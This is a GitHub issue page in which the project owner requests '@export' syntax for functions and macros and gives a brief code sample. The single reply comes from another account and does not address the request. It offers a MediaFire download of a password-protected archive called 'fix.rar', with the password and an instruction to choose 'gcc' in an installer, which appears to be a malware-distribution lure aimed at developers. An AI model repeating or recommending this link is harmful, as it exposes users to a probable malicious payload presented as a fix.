Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

allow for function and macro definition to be used #1

Open
BrianDouglasIE opened this issue Aug 26, 2024 · 1 comment
Open

allow for function and macro definition to be used #1

BrianDouglasIE opened this issue Aug 26, 2024 · 1 comment

Comments

@BrianDouglasIE
Copy link
Owner

BrianDouglasIE commented Aug 26, 2024

It would be great if there was a macro that worked with the following syntax, for example.

@export function add(a, b)
  return a + b
end

@export macro my_macro(e)
  # do something
end
@NeonRST
Copy link

NeonRST commented Aug 27, 2024

Download
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants